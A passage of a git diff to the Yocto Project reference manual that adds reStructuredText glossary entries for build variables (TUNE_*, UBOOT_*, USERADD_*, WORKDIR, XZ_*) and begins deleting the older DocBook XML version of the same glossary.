+      ``meta/conf/machine/include/x86/arch-x86.inc`` file defines the flags
+      for the x86 architecture as follows:
+      ::
+
+         TUNE_LDARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-m elf32_x86_64", "", d)}"
+
+      .. note::
+
+         Board Support Packages (BSPs) select the tune. The selected tune,
+         in turn, affects the tune variables themselves (i.e. the tune can
+         supply its own set of flags).
+
+   :term:`TUNE_PKGARCH`
+      The package architecture understood by the packaging system to define
+      the architecture, ABI, and tuning of output packages. The specific
+      tune is defined using the "_tune" override as follows:
+      ::
+
+         TUNE_PKGARCH_tune-tune = "tune"
+
+      These tune-specific package architectures are defined in the machine
+      include files. Here is an example of the "core2-32" tuning as used in
+      the ``meta/conf/machine/include/tune-core2.inc`` file:
+      ::
+
+         TUNE_PKGARCH_tune-core2-32 = "core2-32"
+
+   :term:`TUNEABI`
+      An underlying Application Binary Interface (ABI) used by a particular
+      tuning in a given toolchain layer. Providers that use prebuilt
+      libraries can use the ``TUNEABI``,
+      :term:`TUNEABI_OVERRIDE`, and
+      :term:`TUNEABI_WHITELIST` variables to check
+      compatibility of tunings against their selection of libraries.
+
+      If ``TUNEABI`` is undefined, then every tuning is allowed. See the
+      :ref:`sanity <ref-classes-sanity>` class to see how the variable is
+      used.
+
+   :term:`TUNEABI_OVERRIDE`
+      If set, the OpenEmbedded system ignores the
+      :term:`TUNEABI_WHITELIST` variable.
+      Providers that use prebuilt libraries can use the
+      ``TUNEABI_OVERRIDE``, ``TUNEABI_WHITELIST``, and
+      :term:`TUNEABI` variables to check compatibility of a
+      tuning against their selection of libraries.
+
+      See the :ref:`sanity <ref-classes-sanity>` class to see how the
+      variable is used.
+
+   :term:`TUNEABI_WHITELIST`
+      A whitelist of permissible :term:`TUNEABI` values. If
+      ``TUNEABI_WHITELIST`` is not set, all tunes are allowed. Providers
+      that use prebuilt libraries can use the ``TUNEABI_WHITELIST``,
+      :term:`TUNEABI_OVERRIDE`, and ``TUNEABI``
+      variables to check compatibility of a tuning against their selection
+      of libraries.
+
+      See the :ref:`sanity <ref-classes-sanity>` class to see how the
+      variable is used.
+
+   :term:`TUNECONFLICTS[feature]`
+      Specifies CPU or Application Binary Interface (ABI) tuning features
+      that conflict with feature.
+
+      Known tuning conflicts are specified in the machine include files in
+      the :term:`Source Directory`. Here is an example from
+      the ``meta/conf/machine/include/mips/arch-mips.inc`` include file
+      that lists the "o32" and "n64" features as conflicting with the "n32"
+      feature:
+      ::
+
+         TUNECONFLICTS[n32] = "o32 n64"
+
+   :term:`TUNEVALID[feature]`
+      Specifies a valid CPU or Application Binary Interface (ABI) tuning
+      feature. The specified feature is stored as a flag. Valid features
+      are specified in the machine include files (e.g.
+      ``meta/conf/machine/include/arm/arch-arm.inc``). Here is an example
+      from that file:
+      ::
+
+         TUNEVALID[bigendian] = "Enable big-endian mode."
+
+      See the machine include files in the :term:`Source Directory`
+      for these features.
+
+   :term:`UBOOT_CONFIG`
+      Configures the :term:`UBOOT_MACHINE` and can
+      also define :term:`IMAGE_FSTYPES` for individual
+      cases.
+
+      Following is an example from the ``meta-fsl-arm`` layer. ::
+
+         UBOOT_CONFIG ??= "sd"
+         UBOOT_CONFIG[sd] = "mx6qsabreauto_config,sdcard"
+         UBOOT_CONFIG[eimnor] = "mx6qsabreauto_eimnor_config"
+         UBOOT_CONFIG[nand] = "mx6qsabreauto_nand_config,ubifs"
+         UBOOT_CONFIG[spinor] = "mx6qsabreauto_spinor_config"
+
+      In this example, "sd" is selected as the configuration of the possible four for the
+      ``UBOOT_MACHINE``. The "sd" configuration defines
+      "mx6qsabreauto_config" as the value for ``UBOOT_MACHINE``, while the
+      "sdcard" specifies the ``IMAGE_FSTYPES`` to use for the U-boot image.
+
+      For more information on how the ``UBOOT_CONFIG`` is handled, see the
+      :ref:`uboot-config <ref-classes-uboot-config>`
+      class.
+
+   :term:`UBOOT_DTB_LOADADDRESS`
+      Specifies the load address for the dtb image used by U-boot. During FIT
+      image creation, the ``UBOOT_DTB_LOADADDRESS`` variable is used in
+      :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify
+      the load address to be used in
+      creating the dtb sections of Image Tree Source for the FIT image.
+
+   :term:`UBOOT_DTBO_LOADADDRESS`
+      Specifies the load address for the dtbo image used by U-boot.  During FIT
+      image creation, the ``UBOOT_DTBO_LOADADDRESS`` variable is used in
+      :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify the load address to be used in
+      creating the dtbo sections of Image Tree Source for the FIT image.
+
+   :term:`UBOOT_ENTRYPOINT`
+      Specifies the entry point for the U-Boot image. During U-Boot image
+      creation, the ``UBOOT_ENTRYPOINT`` variable is passed as a
+      command-line parameter to the ``uboot-mkimage`` utility.
+
+   :term:`UBOOT_LOADADDRESS`
+      Specifies the load address for the U-Boot image. During U-Boot image
+      creation, the ``UBOOT_LOADADDRESS`` variable is passed as a
+      command-line parameter to the ``uboot-mkimage`` utility.
+
+   :term:`UBOOT_LOCALVERSION`
+      Appends a string to the name of the local version of the U-Boot
+      image. For example, assuming the version of the U-Boot image built
+      was "2013.10", the full version string reported by U-Boot would be
+      "2013.10-yocto" given the following statement:
+      ::
+
+         UBOOT_LOCALVERSION = "-yocto"
+
+   :term:`UBOOT_MACHINE`
+      Specifies the value passed on the ``make`` command line when building
+      a U-Boot image. The value indicates the target platform
+      configuration. You typically set this variable from the machine
+      configuration file (i.e. ``conf/machine/machine_name.conf``).
+
+      Please see the "Selection of Processor Architecture and Board Type"
+      section in the U-Boot README for valid values for this variable.
+
+   :term:`UBOOT_MAKE_TARGET`
+      Specifies the target called in the ``Makefile``. The default target
+      is "all".
+
+   :term:`UBOOT_MKIMAGE_DTCOPTS`
+      Options for the device tree compiler passed to mkimage '-D'
+      feature while creating FIT image in :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class.
+
+   :term:`UBOOT_RD_ENTRYPOINT`
+      Specifies the entrypoint for the RAM disk image.
+      During FIT image creation, the
+      ``UBOOT_RD_ENTRYPOINT`` variable is used
+      in :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify the
+      entrypoint to be used in creating the Image Tree Source for
+      the FIT image.
+
+   :term:`UBOOT_RD_LOADADDRESS`
+      Specifies the load address for the RAM disk image.
+      During FIT image creation, the
+      ``UBOOT_RD_LOADADDRESS`` variable is used
+      in :ref:`kernel-fitimage <ref-classes-kernel-fitimage>` class to specify the
+      load address to be used in creating the Image Tree Source for
+      the FIT image.
+
+   :term:`UBOOT_SIGN_ENABLE`
+      Enable signing of FIT image. The default value is "0".
+
+   :term:`UBOOT_SIGN_KEYDIR`
+      Location of the directory containing the RSA key and
+      certificate used for signing FIT image.
+
+   :term:`UBOOT_SIGN_KEYNAME`
+      The name of keys used for signing U-boot FIT image stored in
+      :term:`UBOOT_SIGN_KEYDIR` directory. For e.g. dev.key key and dev.crt
+      certificate stored in :term:`UBOOT_SIGN_KEYDIR` directory will have
+      :term:`UBOOT_SIGN_KEYNAME` set to "dev".
+
+   :term:`UBOOT_SUFFIX`
+      Points to the generated U-Boot extension. For example, ``u-boot.sb``
+      has a ``.sb`` extension.
+
+      The default U-Boot extension is ``.bin``
+
+   :term:`UBOOT_TARGET`
+      Specifies the target used for building U-Boot. The target is passed
+      directly as part of the "make" command (e.g. SPL and AIS). If you do
+      not specifically set this variable, the OpenEmbedded build process
+      passes and uses "all" for the target during the U-Boot building
+      process.
+
+   :term:`UNKNOWN_CONFIGURE_WHITELIST`
+      Specifies a list of options that, if reported by the configure script
+      as being invalid, should not generate a warning during the
+      :ref:`ref-tasks-configure` task. Normally, invalid
+      configure options are simply not passed to the configure script (e.g.
+      should be removed from :term:`EXTRA_OECONF` or
+      :term:`PACKAGECONFIG_CONFARGS`).
+      However, common options, for example, exist that are passed to all
+      configure scripts at a class level that might not be valid for some
+      configure scripts. It follows that no benefit exists in seeing a
+      warning about these options. For these cases, the options are added
+      to ``UNKNOWN_CONFIGURE_WHITELIST``.
+
+      The configure arguments check that uses
+      ``UNKNOWN_CONFIGURE_WHITELIST`` is part of the
+      :ref:`insane <ref-classes-insane>` class and is only enabled if the
+      recipe inherits the :ref:`autotools <ref-classes-autotools>` class.
+
+   :term:`UPDATERCPN`
+      For recipes inheriting the
+      :ref:`update-rc.d <ref-classes-update-rc.d>` class, ``UPDATERCPN``
+      specifies the package that contains the initscript that is enabled.
+
+      The default value is "${PN}". Given that almost all recipes that
+      install initscripts package them in the main package for the recipe,
+      you rarely need to set this variable in individual recipes.
+
+   :term:`UPSTREAM_CHECK_GITTAGREGEX`
+      You can perform a per-recipe check for what the latest upstream
+      source code version is by calling ``bitbake -c checkpkg`` recipe. If
+      the recipe source code is provided from Git repositories, the
+      OpenEmbedded build system determines the latest upstream version by
+      picking the latest tag from the list of all repository tags.
+
+      You can use the ``UPSTREAM_CHECK_GITTAGREGEX`` variable to provide a
+      regular expression to filter only the relevant tags should the
+      default filter not work correctly.
+      ::
+
+         UPSTREAM_CHECK_GITTAGREGEX = "git_tag_regex"
+
+   :term:`UPSTREAM_CHECK_REGEX`
+      Use the ``UPSTREAM_CHECK_REGEX`` variable to specify a different
+      regular expression instead of the default one when the package
+      checking system is parsing the page found using
+      :term:`UPSTREAM_CHECK_URI`.
+      ::
+
+         UPSTREAM_CHECK_REGEX = "package_regex"
+
+   :term:`UPSTREAM_CHECK_URI`
+      You can perform a per-recipe check for what the latest upstream
+      source code version is by calling ``bitbake -c checkpkg`` recipe. If
+      the source code is provided from tarballs, the latest version is
+      determined by fetching the directory listing where the tarball is and
+      attempting to find a later tarball. When this approach does not work,
+      you can use ``UPSTREAM_CHECK_URI`` to provide a different URI that
+      contains the link to the latest tarball.
+      ::
+
+         UPSTREAM_CHECK_URI = "recipe_url"
+
+   :term:`USE_DEVFS`
+      Determines if ``devtmpfs`` is used for ``/dev`` population. The
+      default value used for ``USE_DEVFS`` is "1" when no value is
+      specifically set. Typically, you would set ``USE_DEVFS`` to "0" for a
+      statically populated ``/dev`` directory.
+
+      See the ":ref:`selecting-dev-manager`" section in
+      the Yocto Project Development Tasks Manual for information on how to
+      use this variable.
+
+   :term:`USE_VT`
+      When using
+      :ref:`SysVinit <new-recipe-enabling-system-services>`,
+      determines whether or not to run a
+      `getty <http://en.wikipedia.org/wiki/Getty_%28Unix%29>`__ on any
+      virtual terminals in order to enable logging in through those
+      terminals.
+
+      The default value used for ``USE_VT`` is "1" when no default value is
+      specifically set. Typically, you would set ``USE_VT`` to "0" in the
+      machine configuration file for machines that do not have a graphical
+      display attached and therefore do not need virtual terminal
+      functionality.
+
+   :term:`USER_CLASSES`
+      A list of classes to globally inherit. These classes are used by the
+      OpenEmbedded build system to enable extra features (e.g.
+      ``buildstats``, ``image-mklibs``, and so forth).
+
+      The default list is set in your ``local.conf`` file:
+      ::
+
+         USER_CLASSES ?= "buildstats image-mklibs image-prelink"
+
+      For more information, see
+      ``meta-poky/conf/local.conf.sample`` in the :term:`Source Directory`.
+
+   :term:`USERADD_ERROR_DYNAMIC`
+      If set to ``error``, forces the OpenEmbedded build system to produce
+      an error if the user identification (``uid``) and group
+      identification (``gid``) values are not defined in any of the files
+      listed in :term:`USERADD_UID_TABLES` and
+      :term:`USERADD_GID_TABLES`. If set to
+      ``warn``, a warning will be issued instead.
+
+      The default behavior for the build system is to dynamically apply
+      ``uid`` and ``gid`` values. Consequently, the
+      ``USERADD_ERROR_DYNAMIC`` variable is by default not set. If you plan
+      on using statically assigned ``gid`` and ``uid`` values, you should
+      set the ``USERADD_ERROR_DYNAMIC`` variable in your ``local.conf``
+      file as follows:
+      ::
+
+         USERADD_ERROR_DYNAMIC = "error"
+
+      Overriding the
+      default behavior implies you are going to also take steps to set
+      static ``uid`` and ``gid`` values through use of the
+      :term:`USERADDEXTENSION`,
+      :term:`USERADD_UID_TABLES`, and
+      :term:`USERADD_GID_TABLES` variables.
+
+      .. note::
+
+         There is a difference in behavior between setting
+         ``USERADD_ERROR_DYNAMIC`` to ``error`` and setting it to ``warn``.
+         When it is set to ``warn``, the build system will report a warning for
+         every undefined ``uid`` and ``gid`` in any recipe. But when it is set
+         to ``error``, it will only report errors for recipes that are actually
+         built.
+         This saves you from having to add static IDs for recipes that you
+         know will never be built.
+
+   :term:`USERADD_GID_TABLES`
+      Specifies a password file to use for obtaining static group
+      identification (``gid``) values when the OpenEmbedded build system
+      adds a group to the system during package installation.
+
+      When applying static group identification (``gid``) values, the
+      OpenEmbedded build system looks in :term:`BBPATH` for a
+      ``files/group`` file and then applies those ``uid`` values. Set the
+      variable as follows in your ``local.conf`` file:
+      ::
+
+
+         USERADD_GID_TABLES = "files/group"
+
+      .. note::
+
+         Setting the :term:`USERADDEXTENSION` variable to "useradd-staticids"
+         causes the build system to use static ``gid`` values.
+
+   :term:`USERADD_PACKAGES`
+      When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+      this variable specifies the individual packages within the recipe
+      that require users and/or groups to be added.
+
+      You must set this variable if the recipe inherits the class. For
+      example, the following enables adding a user for the main package in
+      a recipe:
+      ::
+
+         USERADD_PACKAGES = "${PN}"
+
+      .. note::
+
+         It follows that if you are going to use the ``USERADD_PACKAGES``
+         variable, you need to set one or more of the :term:`USERADD_PARAM`,
+         :term:`GROUPADD_PARAM`, or :term:`GROUPMEMS_PARAM` variables.
+
+   :term:`USERADD_PARAM`
+      When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+      this variable specifies for a package what parameters should pass to
+      the ``useradd`` command if you add a user to the system when the
+      package is installed.
+
+      Here is an example from the ``dbus`` recipe:
+      ::
+
+         USERADD_PARAM_${PN} = "--system --home ${localstatedir}/lib/dbus \
+                                --no-create-home --shell /bin/false \
+                                --user-group messagebus"
+
+      For information on the
+      standard Linux shell command ``useradd``, see
+      http://linux.die.net/man/8/useradd.
+
+   :term:`USERADD_UID_TABLES`
+      Specifies a password file to use for obtaining static user
+      identification (``uid``) values when the OpenEmbedded build system
+      adds a user to the system during package installation.
+
+      When applying static user identification (``uid``) values, the
+      OpenEmbedded build system looks in :term:`BBPATH` for a
+      ``files/passwd`` file and then applies those ``uid`` values. Set the
+      variable as follows in your ``local.conf`` file:
+      ::
+
+         USERADD_UID_TABLES = "files/passwd"
+
+      .. note::
+
+         Setting the :term:`USERADDEXTENSION` variable to "useradd-staticids"
+         causes the build system to use static ``uid`` values.
+
+   :term:`USERADDEXTENSION`
+      When set to "useradd-staticids", causes the OpenEmbedded build system
+      to base all user and group additions on a static ``passwd`` and
+      ``group`` files found in :term:`BBPATH`.
+
+      To use static user identification (``uid``) and group identification
+      (``gid``) values, set the variable as follows in your ``local.conf``
+      file: USERADDEXTENSION = "useradd-staticids"
+
+      .. note::
+
+         Setting this variable to use static ``uid`` and ``gid``
+         values causes the OpenEmbedded build system to employ the
+         :ref:`ref-classes-useradd` class.
+
+      If you use static ``uid`` and ``gid`` information, you must also
+      specify the ``files/passwd`` and ``files/group`` files by setting the
+      :term:`USERADD_UID_TABLES` and
+      :term:`USERADD_GID_TABLES` variables.
+      Additionally, you should also set the
+      :term:`USERADD_ERROR_DYNAMIC` variable.
+
+   :term:`VOLATILE_LOG_DIR`
+      Specifies the persistence of the target's ``/var/log`` directory,
+      which is used to house postinstall target log files.
+
+      By default, ``VOLATILE_LOG_DIR`` is set to "yes", which means the
+      file is not persistent. You can override this setting by setting the
+      variable to "no" to make the log directory persistent.
+
+   :term:`WARN_QA`
+      Specifies the quality assurance checks whose failures are reported as
+      warnings by the OpenEmbedded build system. You set this variable in
+      your distribution configuration file. For a list of the checks you
+      can control with this variable, see the
+      ":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+   :term:`WKS_FILE`
+      Specifies the location of the Wic kickstart file that is used by the
+      OpenEmbedded build system to create a partitioned image
+      (image\ ``.wic``). For information on how to create a partitioned
+      image, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:creating partitioned images using wic`"
+      section in the Yocto Project Development Tasks Manual. For details on
+      the kickstart file format, see the ":doc:`../ref-manual/ref-kickstart`" Chapter.
+
+   :term:`WKS_FILE_DEPENDS`
+      When placed in the recipe that builds your image, this variable lists
+      build-time dependencies. The ``WKS_FILE_DEPENDS`` variable is only
+      applicable when Wic images are active (i.e. when
+      :term:`IMAGE_FSTYPES` contains entries related
+      to Wic). If your recipe does not create Wic images, the variable has
+      no effect.
+
+      The ``WKS_FILE_DEPENDS`` variable is similar to the
+      :term:`DEPENDS` variable. When you use the variable in
+      your recipe that builds the Wic image, dependencies you list in the
+      ``WIC_FILE_DEPENDS`` variable are added to the ``DEPENDS`` variable.
+
+      With the ``WKS_FILE_DEPENDS`` variable, you have the possibility to
+      specify a list of additional dependencies (e.g. native tools,
+      bootloaders, and so forth), that are required to build Wic images.
+      Following is an example:
+      ::
+
+         WKS_FILE_DEPENDS = "some-native-tool"
+
+      In the
+      previous example, some-native-tool would be replaced with an actual
+      native tool on which the build would depend.
+
+   :term:`WORKDIR`
+      The pathname of the work directory in which the OpenEmbedded build
+      system builds a recipe. This directory is located within the
+      :term:`TMPDIR` directory structure and is specific to
+      the recipe being built and the system for which it is being built.
+
+      The ``WORKDIR`` directory is defined as follows:
+      ::
+
+         ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
+
+      The actual directory depends on several things:
+
+      -  :term:`TMPDIR`: The top-level build output directory
+      -  :term:`MULTIMACH_TARGET_SYS`: The target system identifier
+      -  :term:`PN`: The recipe name
+      -  :term:`EXTENDPE`: The epoch - (if :term:`PE` is not specified, which
+         is usually the case for most recipes, then `EXTENDPE` is blank)
+      -  :term:`PV`: The recipe version
+      -  :term:`PR`: The recipe revision
+
+      As an example, assume a Source Directory top-level folder name
+      ``poky``, a default Build Directory at ``poky/build``, and a
+      ``qemux86-poky-linux`` machine target system. Furthermore, suppose
+      your recipe is named ``foo_1.3.0-r0.bb``. In this case, the work
+      directory the build system uses to build the package would be as
+      follows:
+      ::
+
+         poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
+
+   :term:`XSERVER`
+      Specifies the packages that should be installed to provide an X
+      server and drivers for the current machine, assuming your image
+      directly includes ``packagegroup-core-x11-xserver`` or, perhaps
+      indirectly, includes "x11-base" in
+      :term:`IMAGE_FEATURES`.
+
+      The default value of ``XSERVER``, if not specified in the machine
+      configuration, is "xserver-xorg xf86-video-fbdev xf86-input-evdev".
+
+   :term:`XZ_THREADS`
+      Specifies the number of parallel threads that should be used when
+      using xz compression.
+
+      By default this scales with core count, but is never set less than 2
+      to ensure that multi-threaded mode is always used so that the output
+      file contents are deterministic. Builds will work with a value of 1
+      but the output will differ compared to the output from the compression
+      generated when more than one thread is used.
+
+      On systems where many tasks run in parallel, setting a limit to this
+      can be helpful in controlling system resource usage.
+
+    :term:`XZ_MEMLIMIT`
+      Specifies the maximum memory the xz compression should use as a percentage
+      of system memory. If unconstrained the xz compressor can use large amounts of
+      memory and become problematic with parallelism elsewhere in the build.
+      "50%" has been found to be a good value.
diff --git a/documentation/ref-manual/ref-variables.xml b/documentation/ref-manual/ref-variables.xml
deleted file mode 100644
index 364cd09eb8..0000000000
--- a/documentation/ref-manual/ref-variables.xml
+++ /dev/null
@@ -1,16700 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<!-- Dummy chapter -->
-<chapter id='ref-variables-glos'>
-
-<title>Variables Glossary</title>
-
-<para>
-    This chapter lists common variables used in the OpenEmbedded build system and gives an overview
-    of their function and contents.
-</para>
-
-<glossary id='ref-variables-glossary'>
-
-
-    <para>
-       <link linkend='var-ABIEXTENSION'>A</link>
-       <link linkend='var-B'>B</link>
-       <link linkend='var-CACHE'>C</link>
-       <link linkend='var-D'>D</link>
-       <link linkend='var-EFI_PROVIDER'>E</link>
-       <link linkend='var-FEATURE_PACKAGES'>F</link>
-       <link linkend='var-GCCPIE'>G</link>
-       <link linkend='var-HOMEPAGE'>H</link>
-       <link linkend='var-ICECC_DISABLED'>I</link>
-<!--               <link linkend='var-glossary-j'>J</link> -->
-       <link linkend='var-KARCH'>K</link>
-       <link linkend='var-LABELS'>L</link>
-       <link linkend='var-MACHINE'>M</link>
-       <link linkend='var-NATIVELSBSTRING'>N</link>
-       <link linkend='var-OBJCOPY'>O</link>
-       <link linkend='var-P'>P</link>
-<!--               <link linkend='var-glossary-q'>Q</link> -->
-       <link linkend='var-RANLIB'>R</link>
-       <link linkend='var-S'>S</link>
-       <link linkend='var-T'>T</link>
-       <link linkend='var-UBOOT_CONFIG'>U</link>
-       <link linkend='var-VOLATILE_LOG_DIR'>V</link>
-       <link linkend='var-WARN_QA'>W</link>
-       <link linkend='var-XSERVER'>X</link>
-<!--               <link linkend='var-glossary-y'>Y</link> -->
-<!--               <link linkend='var-glossary-z'>Z</link>-->
-    </para>
-
-    <glossdiv id='var-glossary-a'><title>A</title>
-
-        <glossentry id='var-ABIEXTENSION'><glossterm>ABIEXTENSION</glossterm>
-            <info>
-                ABIEXTENSION[doc] = "Extension to the Application Binary Interface (ABI) field of the GNU canonical architecture name (e.g. "eabi")."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Extension to the Application Binary Interface (ABI)
-                    field of the GNU canonical architecture name
-                    (e.g. "eabi").
-                </para>
-
-                <para>
-                   ABI extensions are set in the machine include files.
-                   For example, the
-                   <filename>meta/conf/machine/include/arm/arch-arm.inc</filename>
-                   file sets the following extension:
-                   <literallayout class='monospaced'>
-     ABIEXTENSION = "eabi"
-                   </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ALLOW_EMPTY'><glossterm>ALLOW_EMPTY</glossterm>
-            <info>
-                ALLOW_EMPTY[doc] = "Specifies whether to produce an output package even if it is empty."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                   Specifies whether to produce an output package even if it is
-                   empty.
-                   By default, BitBake does not produce empty packages.
-                   This default behavior can cause issues when there is an
-                   <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link> or
-                   some other hard runtime requirement on the existence of the package.
-                </para>
-
-                <para>
-                   Like all package-controlling variables, you must always use them in
-                   conjunction with a package name override, as in:
-                   <literallayout class='monospaced'>
-     ALLOW_EMPTY_${PN} = "1"
-     ALLOW_EMPTY_${PN}-dev = "1"
-     ALLOW_EMPTY_${PN}-staticdev = "1"
-                   </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ALTERNATIVE'><glossterm>ALTERNATIVE</glossterm>
-            <info>
-                ALTERNATIVE[doc] = "Lists commands in a package that need an alternative binary naming scheme."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists commands in a package that need an alternative
-                    binary naming scheme.
-                    Sometimes the same command is provided in multiple packages.
-                    When this occurs, the OpenEmbedded build system needs to
-                    use the alternatives system to create a different binary
-                    naming scheme so the commands can co-exist.
-                </para>
-
-                <para>
-                    To use the variable, list out the package's commands
-                    that also exist as part of another package.
-                    For example, if the <filename>busybox</filename> package
-                    has four commands that also exist as part of another
-                    package, you identify them as follows:
-                    <literallayout class='monospaced'>
-     ALTERNATIVE_busybox = "sh sed test bracket"
-                    </literallayout>
-                    For more information on the alternatives system, see the
-                    "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ALTERNATIVE_LINK_NAME'><glossterm>ALTERNATIVE_LINK_NAME</glossterm>
-            <info>
-                ALTERNATIVE_LINK_NAME[doc] = "Used by the alternatives system to map duplicated commands to actual locations."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Used by the alternatives system to map duplicated commands
-                    to actual locations.
-                    For example, if the <filename>bracket</filename> command
-                    provided by the <filename>busybox</filename> package is
-                    duplicated through another package, you must use the
-                    <filename>ALTERNATIVE_LINK_NAME</filename> variable to
-                    specify the actual location:
-                    <literallayout class='monospaced'>
-     ALTERNATIVE_LINK_NAME[bracket] = "/usr/bin/["
-                    </literallayout>
-                </para>
-
-                <para>
-                    In this example, the binary for the
-                    <filename>bracket</filename> command (i.e.
-                    <filename>[</filename>) from the
-                    <filename>busybox</filename> package resides in
-                    <filename>/usr/bin/</filename>.
-                    <note>
-                        If <filename>ALTERNATIVE_LINK_NAME</filename> is not
-                        defined, it defaults to
-                        <filename>${bindir}/<replaceable>name</replaceable></filename>.
-                    </note>
-                </para>
-
-                <para>
-                    For more information on the alternatives system, see the
-                    "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ALTERNATIVE_PRIORITY'><glossterm>ALTERNATIVE_PRIORITY</glossterm>
-            <info>
-                ALTERNATIVE_PRIORITY[doc] = "Used by the alternatives system to create default priorities for duplicated commands."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Used by the alternatives system to create default
-                    priorities for duplicated commands.
-                    You can use the variable to create a single default
-                    regardless of the command name or package, a default for
-                    specific duplicated commands regardless of the package, or
-                    a default for specific commands tied to particular packages.
-                    Here are the available syntax forms:
-                    <literallayout class='monospaced'>
-     ALTERNATIVE_PRIORITY = "<replaceable>priority</replaceable>"
-     ALTERNATIVE_PRIORITY[<replaceable>name</replaceable>] = "<replaceable>priority</replaceable>"
-     ALTERNATIVE_PRIORITY_<replaceable>pkg</replaceable>[<replaceable>name</replaceable>] = "<replaceable>priority</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For more information on the alternatives system, see the
-                    "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ALTERNATIVE_TARGET'><glossterm>ALTERNATIVE_TARGET</glossterm>
-            <info>
-                ALTERNATIVE_TARGET[doc] = "Used by the alternatives system to create default link locations for duplicated commands."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Used by the alternatives system to create default link
-                    locations for duplicated commands.
-                    You can use the variable to create a single default
-                    location for all duplicated commands regardless of the
-                    command name or package, a default for
-                    specific duplicated commands regardless of the package, or
-                    a default for specific commands tied to particular packages.
-                    Here are the available syntax forms:
-                    <literallayout class='monospaced'>
-     ALTERNATIVE_TARGET = "<replaceable>target</replaceable>"
-     ALTERNATIVE_TARGET[<replaceable>name</replaceable>] = "<replaceable>target</replaceable>"
-     ALTERNATIVE_TARGET_<replaceable>pkg</replaceable>[<replaceable>name</replaceable>] = "<replaceable>target</replaceable>"
-                    </literallayout>
-                    <note>
-                        <para>
-                            If <filename>ALTERNATIVE_TARGET</filename> is not
-                            defined, it inherits the value from the
-                            <link linkend='var-ALTERNATIVE_LINK_NAME'><filename>ALTERNATIVE_LINK_NAME</filename></link>
-                            variable.
-                        </para>
-
-                        <para>
-                            If <filename>ALTERNATIVE_LINK_NAME</filename> and
-                            <filename>ALTERNATIVE_TARGET</filename> are the
-                            same, the target for
-                            <filename>ALTERNATIVE_TARGET</filename>
-                            has "<filename>.{BPN}</filename>" appended to it.
-                        </para>
-
-                        <para>
-                            Finally, if the file referenced has not been
-                            renamed, the alternatives system will rename it to
-                            avoid the need to rename alternative files in the
-                            <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                            task while
-                            retaining support for the command if necessary.
-                        </para>
-                    </note>
-                </para>
-
-                <para>
-                    For more information on the alternatives system, see the
-                    "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-APPEND'><glossterm>APPEND</glossterm>
-            <info>
-                APPEND[doc] = "An override list of append strings for target specified using LABELS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An override list of append strings for each target
-                    specified with
-                    <link linkend='var-LABELS'><filename>LABELS</filename></link>.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
-                    class for more information on how this variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AR'><glossterm>AR</glossterm>
-            <info>
-                AR[doc] = "Minimal command and arguments to run 'ar'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments used to run
-                    <filename>ar</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ARCHIVER_MODE'><glossterm>ARCHIVER_MODE</glossterm>
-            <info>
-                ARCHIVER_MODE[doc] = "Controls archive creation used when releasing source files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When used with the
-                    <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-                    class, determines the type of information used to create
-                    a released archive.
-                    You can use this variable to create archives of patched
-                    source, original source, configured source, and so forth
-                    by employing the following variable flags (varflags):
-                    <literallayout class='monospaced'>
-     ARCHIVER_MODE[src] = "original"                 # Uses original (unpacked) source
-                                                     # files.
-
-     ARCHIVER_MODE[src] = "patched"                  # Uses patched source files. This is
-                                                     # the default.
-
-     ARCHIVER_MODE[src] = "configured"               # Uses configured source files.
-
-     ARCHIVER_MODE[diff] = "1"                       # Uses patches between do_unpack and
-                                                     # do_patch.
-
-     ARCHIVER_MODE[diff-exclude] ?= "<replaceable>file</replaceable> <replaceable>file</replaceable> ..."  # Lists files and directories to
-                                                     # exclude from diff.
-
-     ARCHIVER_MODE[dumpdata] = "1"                   # Uses environment data.
-
-     ARCHIVER_MODE[recipe] = "1"                     # Uses recipe and include files.
-
